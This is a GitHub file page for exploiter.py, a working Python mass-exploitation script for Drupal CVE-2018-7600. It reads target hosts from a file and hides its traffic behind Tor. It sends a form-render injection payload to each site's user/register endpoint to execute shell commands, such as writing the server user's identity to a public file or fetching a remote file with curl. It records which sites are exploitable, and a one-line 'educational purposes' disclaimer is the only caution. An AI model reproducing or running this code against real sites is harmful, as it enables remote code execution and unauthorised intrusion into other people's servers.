This repository has been archived by the owner on Jul 18, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploiter.py
189 lines (154 loc) · 5.67 KB
/
exploiter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
#!/usr/bin/env python3
from random import sample
from string import ascii_lowercase
from readline import parse_and_bind
from requests import session, Timeout, RequestException
info = '\033[1;33m[!]\033[1;m '
que = '\033[1;34m[?]\033[1;m '
bad = '\033[1;31m[-]\033[1;m '
good = '\033[1;32m[+]\033[1;m '
# Config:
ignore_warnings = False # Ignores warnings
cleanup = False # Automated Cleanup
write_file = True # Write exploitable targets to file
tor_proxy = True # Uses Tor network
# Creates random file name
random_file_name = ''.join(sample(ascii_lowercase, 5)) + ".txt"
# Bash command for creating user file
user_data_command = "echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s" % random_file_name
# Bash command for downloading file
download_command = "curl -so %s %s" % ("example_file.html",
"https://example.com")
# Bash command for deleting
rm_command = "rm %s" % random_file_name
# Selected command
selected_command = user_data_command
# Tor session
def session_setup():
try:
requests_session = session()
if tor_proxy:
import socks
tor_socks = 'socks5://127.0.0.1:9050'
requests_session.proxies = {'http': tor_socks, 'https': tor_socks}
return requests_session
except ImportError:
print(
bad +
"Error importing socks to to Tor, make sure to `pip3 install pysocks`"
)
exit(1)
def whats_my_ip(session):
your_ip = session.get("http://httpbin.org/ip").json()["origin"]
print(good + "Your IP: " + your_ip)
def cleanup_url(target):
target = target.strip()
if not target.startswith('http'):
target = "http://" + target
if not target.endswith('/'):
target = target + '/'
return target
def is_website_up(website, session):
try:
response = session.get(website, timeout=5)
return (response.status_code == 200)
except Timeout:
return False
except RequestException as error:
print(bad + website + " RequestException: ")
print(bad + str(error))
return False
def drupal_version(website, session):
response = session.get(website)
try:
version = response.headers["X-Generator"].replace(
" (https://www.drupal.org)", "")
print(good + "Drupal Version: " + version)
return version
except KeyError:
print(bad + website + " does not appear to be running Drupal")
return None
def generate_payload(command):
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': command
}
return payload
def send_payload(target, payload, session):
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
return session.post(url, data=payload)
def send_command(target, command, session):
return send_payload(target, generate_payload(command), session)
def check_if_file_created(target, file_name, session):
url = target + file_name
print(good + 'Checking... ' + url)
file_response = session.get(url)
if file_response.status_code != 404:
print(good + 'File successfully created:')
print(' ' * 4 + file_response.text.strip())
cleanup_file(target, file_name, session)
return True
else:
print(bad + target + ' File creation unsuccessful')
return False
def cleanup_file(target, file_name, session):
url = target + file_name
if cleanup:
print(good + "Deleting... " + url)
send_command(target, rm_command, session)
def cve_2018_7600(target, session):
r = send_command(target, selected_command, session)
if r.status_code == 200:
print(good + target + ' Possibly exploitable')
return check_if_file_created(target, random_file_name, session)
else:
print(bad + target + ' Not exploitable')
return False
def exploit_from_file(file_name, session):
vulnerable_sites = []
with open(file_name) as file:
for target in file:
target = cleanup_url(target)
if is_website_up(target, session) or ignore_warnings:
if drupal_version(target, session) or ignore_warnings:
if cve_2018_7600(target, session):
vulnerable_sites.append(target)
else:
print(bad + target + " is down")
return vulnerable_sites
def write_to_file(vulnerable_sites):
if vulnerable_sites:
with open("exploitable", "w") as file:
for site in vulnerable_sites:
file.write(site)
if __name__ == '__main__':
try:
print(info +
'Provided only for educational or information purposes.'.upper())
parse_and_bind('tab: complete')
file_name = str(
input(que + 'Enter file name (example: /root/file/hosts.txt): '))
requests_session = session_setup()
whats_my_ip(requests_session)
exploit_from_file = exploit_from_file(file_name, requests_session)
if write_file:
write_to_file(exploit_from_file)
except KeyboardInterrupt:
print(bad + "Exiting...")
exit(0)
except RequestException as error:
if tor_proxy:
print(bad +
"Error connection to Tor, start Tor or disable `tor_proxy`")
else:
print(bad + "Connection Error: " + str(error))
exit(1)
except Exception as error:
print(bad + str(error))
print(
bad +
"Oops, please go to https://github.com/thehappydinoa/CVE-2018-7600 and create an issue"
)